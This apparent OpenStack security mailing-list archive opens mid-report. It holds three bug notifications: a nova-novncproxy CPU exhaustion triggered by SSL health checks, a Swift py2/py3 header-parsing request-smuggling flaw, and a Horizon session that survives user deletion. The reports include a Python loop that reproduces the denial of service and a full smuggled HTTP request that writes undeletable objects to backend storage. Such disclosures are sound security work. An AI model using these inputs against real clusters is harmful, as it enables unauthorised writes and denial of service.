Connection reset by peer 2019-02-19 15:02:45.452 2889 DEBUG nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] exception vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy Traceback (most recent call last): 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 928, in top_new_client 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy client = self.do_handshake(startsock, address) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 858, in do_handshake 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.RequestHandlerClass(retsock, address, self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/nova/console/websocketproxy.py", line 311, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy websockify.ProxyRequestHandler.__init__(self, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 113, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.__init__(self, req, addr, server) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/SocketServer.py", line 652, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 579, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.handle(self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 340, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle_one_request() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 310, in handle_one_request 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.raw_requestline = self.rfile.readline(65537) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/socket.py", line 480, in readline 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy data = self._sock.recv(self._rbufsize) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 190, in recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return self._base_recv(buflen, flags, into=False) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 217, in _base_recv 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy read = self.read(nbytes) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 135, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy super(GreenSSLSocket, self).read, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 109, in _call_trampolining 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy return func(*a, **kw) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/ssl.py", line 673, in read 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy v = self._sslobj.read(len) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy error: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy 2019-02-19 15:02:47.037 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 (paste: http://paste.openstack.org/show/745451/) This sequence starting with the "new handler Process" repeats continuously. It seems that the haproxy health checks initiate an SSL connection but then immediately send a TCP RST: http://git.haproxy.org/?p=haproxy.git;a=commit;h=fd29cc537b8511db6e256529ded625c8e7f856d0 For most services this does not seem to be an issue, but for nova- novncproxy it repeatedly initializes NovaProxyRequestHandler which creates a full nova.compute.rpcapi.ComputeAPI instance which very quickly starts to consume significant CPU and overtake the host. Note that we tried upgrading to HEAD of websockify and eventlet which did not improve the issue. Our workaround was to turn off check-ssl in haproxy and use a basic tcp check, but we're concerned that nova-novncproxy remains vulnerable to a DOS attack given how easy it is for haproxy to overload the service. For that reason I'm opening this initially as a security bug, though you could perhaps argue that it's no secret that making un-ratelimited requests at any service will cause high load. Steps to reproduce ================== 1. Configure nova-novncproxy to use SSL by setting the cert= and key= parameters in [DEFAULT] and turn on debug logging. 2. You can simulate the haproxy SSL health check with this python script:     import socket, ssl, struct, time     host = '192.168.237.81'     port = 5554     while True:         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)         ssl_sock = ssl.wrap_socket(sock)         ssl_sock.connect((host, port))         ssl_sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))         sock.close()         time.sleep(2) Expected result =============== nova-novncproxy should gracefully handle the RST and not start overutilizing CPU. It should probably hold off on initializing database connections and such until a meaningful request other than an SSL HELLO is received. Actual result ============= The nova-novncproxy process quickly jumps to the top of the CPU% metrics of process analyzers like top and htop and if left unattended on a server with few cores will cause the server's overall performance to be degraded. Environment =========== We found this on the latest of the stable/rocky branch on SLES: # cat /etc/os-release NAME="SLES" VERSION="12-SP4" VERSION_ID="12.4" PRETTY_NAME="SUSE Linux Enterprise Server 12 SP4" # uname -a Linux d52-54-77-77-01-01 4.12.14-95.6-default #1 SMP Thu Jan 17 06:04:39 UTC 2019 (6af4ef8) x86_64 x86_64 x86_64 GNU/Linux # zypper info openstack-nova Information for package openstack-nova: --------------------------------------- Repository : Cloud Name : openstack-nova Version : 18.1.1~dev47-749.1 Arch : noarch Vendor : obs://build.suse.de/Devel:Cloud Support Level : Level 3 Installed Size : 444.7 KiB Installed : Yes Status : up-to-date Source package : openstack-nova-18.1.1~dev47-749.1.src Summary : OpenStack Compute (Nova) # zypper info haproxy Information for package haproxy: -------------------------------- Repository : Cloud Name : haproxy Version : 1.6.11-10.2 Arch : x86_64 Vendor : SUSE LLC Support Level : Level 3 Installed Size : 3.1 MiB Installed : Yes Status : up-to-date Source package : haproxy-1.6.11-10.2.src To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1816727/+subscriptions From 1840507 at bugs.launchpad.net Fri Sep 27 23:01:05 2019 From: 1840507 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 27 Sep 2019 23:01:05 -0000 Subject: [Openstack-security] [Bug 1840507] Related fix merged to swift (master) References: <156599088351.26410.7391620144910796824.malonedeb@gac.canonical.com> Message-ID: <156962526597.2093.2948243972769406380.malone@soybean.canonical.com> Reviewed: https://review.opendev.org/682173 Committed: https://git.openstack.org/cgit/openstack/swift/commit/?id=291873e784aeac30c2adcaaaca6ab43c2393b289 Submitter: Zuul Branch: master commit 291873e784aeac30c2adcaaaca6ab43c2393b289 Author: Tim Burke Date: Thu Aug 15 14:33:06 2019 -0700 proxy: Don't trust Content-Length for chunked transfers Previously we'd - complain that a client disconnected even though they finished their chunked transfer just fine, and - on EC, send a X-Backend-Obj-Content-Length for pre-allocation even though Content-Length doesn't determine request body size. Change-Id: Ia80e595f713695cbb41dab575963f2cb9bebfa09 Related-Bug: 1840507 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840507 Title: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): New Bug description: Python 3 doesn't parse headers the same way as python 2 [1]. We attempt to address this failing [2], but since we're doing it at the application level, eventlet can still get confused about what should and should not be the request body. Consider a client request like   PUT /v1/AUTH_test/c/o HTTP/1.1   Host: saio:8080   Content-Length: 4   Connection: close   X-Object-Meta-x-🌴: 👍   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Transfer-Encoding: chunked   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 A python 2 proxy-server will auth the user, add a bunch more headers, and send a request on to the object-servers like   PUT /sdb1/312/AUTH_test/c/o HTTP/1.1   Accept-Encoding: identity   Expect: 100-continue   X-Container-Device: sdb2   Content-Length: 4   X-Object-Meta-X-🌴: 👍   Connection: close   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Content-Type: application/octet-stream   X-Backend-Storage-Policy-Index: 1   X-Timestamp: 1565985475.83685   X-Container-Host: 127.0.0.1:6021   X-Container-Partition: 61   Host: saio:8080   User-Agent: proxy-server 3752   Referer: PUT http://saio:8080/v1/AUTH_test/c/o   Transfer-Encoding: chunked   X-Trans-Id: txef407697a8c1416c9cf2d-005d570ac3   X-Backend-Clean-Expiring-Object-Queue: f (Note that the exact order of the headers will vary but is significant; the above was obtained on my machine with PYTHONHASHSEED=1.) On a python 3 object-server, eventlet will only have seen the headers up to (and not including, though that doesn't really matter) the palm tree. Significantly, it sees `Content-Length: 4` (which, per the spec [3], the proxy-server ignored) and doesn't see either of `Connection: close` or `Transfer-Encoding: chunked`. The *application* gets all of the headers, though, so it responds   HTTP/1.1 100 Continue and the proxy sends the body:   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 Since eventlet thinks the request body is only four bytes, swift writes down b'aa\r\n' for AUTH_test/c/o. Since eventlet didn't see the `Connection: close` header, it looks for and processes more requests on the socket, and swift writes a second object:   $ swift-object-info /srv/node1/sdb1/objects-1/0/*/*/9999999999.99999_ffffffffffffffff.data   Path: /DUDE_u/r/pwned     Account: DUDE_u     Container: r     Object: pwned     Object hash: b05097e51f8700a3f5a29d93eb2941f2   Content-Type: text/evil   Timestamp: 2286-11-20T17:46:39.999990 (9999999999.99999_ffffffffffffffff)   System Metadata:     No metadata found   Transient System Metadata:     No metadata found   User Metadata:     No metadata found   Other Metadata:     No metadata found   ETag: 4034a346ccee15292d823416f7510a2f (valid)   Content-Length: 4 (valid)   Partition 705   Hash b05097e51f8700a3f5a29d93eb2941f2   ... There are a few things worth noting at this point: 1. This was for a replicated policy with encryption not enabled.    Having encryption enabled would mitigate this as the attack    payload would be encrypted; using an erasure-coded policy would    complicate the attack, but I believe most EC schemes would still    be vulnerable. 2. An attacker would need to know (or be able to guess) a device    name (such as "sdb1" above) used by one of the backend nodes. 3. Swift doesn't know how to delete this data -- the X-Timestamp    used was the maximum valid value, so no tombstone can be    written over it [4]. 4. The account and container may not actually exist; it doesn't    really matter as no container update is sent. As a result, the    data written cannot easily be found or tracked. 5. A small payload was used for the demonstration, but it should    be fairly trivial to craft a larger one; this has potential as    a DOS attack on a cluster by filling its disks. The fix should involve at least things: First, after re-parsing headers, servers should make appropriate adjustments to environ['wsgi.input'] to ensure that it has all relevant information about the request body. Second, the proxy should not include a Content-Length header when sending a chunk-encoded request to the backend. [1] https://bugs.python.org/issue37093 [2] https://github.com/openstack/swift/commit/76fde8926 [3] https://tools.ietf.org/html/rfc7230#section-3.3.3 item 3 [4] https://github.com/openstack/swift/commit/f581fccf7 To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1840507/+subscriptions From 1842930 at bugs.launchpad.net Mon Sep 30 12:59:11 2019 From: 1842930 at bugs.launchpad.net (Akihiro Motoki) Date: Mon, 30 Sep 2019 12:59:11 -0000 Subject: [Openstack-security] [Bug 1842930] Re: Deleted user still can delete volumes in Horizon References: <156769210930.16602.2940021268217423738.malonedeb@gac.canonical.com> Message-ID: <156984835188.15756.17012402024348340059.malone@chaenomeles.canonical.com> Changing horizon priority to Medium (as the priority in keystone is medium and there is no reason to use higher priority in horizon). ** Changed in: horizon Importance: High => Medium -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1842930 Title: Deleted user still can delete volumes in Horizon Status in OpenStack Dashboard (Horizon): Confirmed Status in OpenStack Identity (keystone): Invalid Status in keystonemiddleware: Triaged Status in OpenStack Security Advisory: Won't Fix Bug description: ==Problem== User session in a second browser is not terminated after deleting this user by admin from another browser. User is still able to manage some objects (delete volumes, for example) in a project after being deleted by admin. ==Steps to reproduce== Install OpenStack following official docs for Stein. Login as admin to (Horizon) in one browser. Create a user with role 'member' and assign it to a project. Open another browser and login as created user. As admin user delete created user from "first" browser. Switch to the "second" browser and try to browse through different sections in the dashboard as deleted user -> instances are not shown, but deleted user can list images, volumes, networks. Also this deleted user can delete a volume. ==Expected result== User session in current browser is closed after user is deleted in another browser. I tried this in Newton release and it works as expected (for a short time before session is ended, this deleted user can't list object in instances,volumes). ==Environment== OpenStack Stein rpm -qa | grep -i stein centos-release-openstack-stein-1-1.el7.centos.noarch cat /etc/redhat-release CentOS Linux release 7.6.1810 (Core)  rpm -qa | grep -i horizon python2-django-horizon-15.1.0-1.el7.noarch rpm -qa | grep -i dashboard openstack-dashboard-15.1.0-1.el7.noarch openstack-dashboard-theme-15.1.0-1.el7.noarch To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1842930/+subscriptions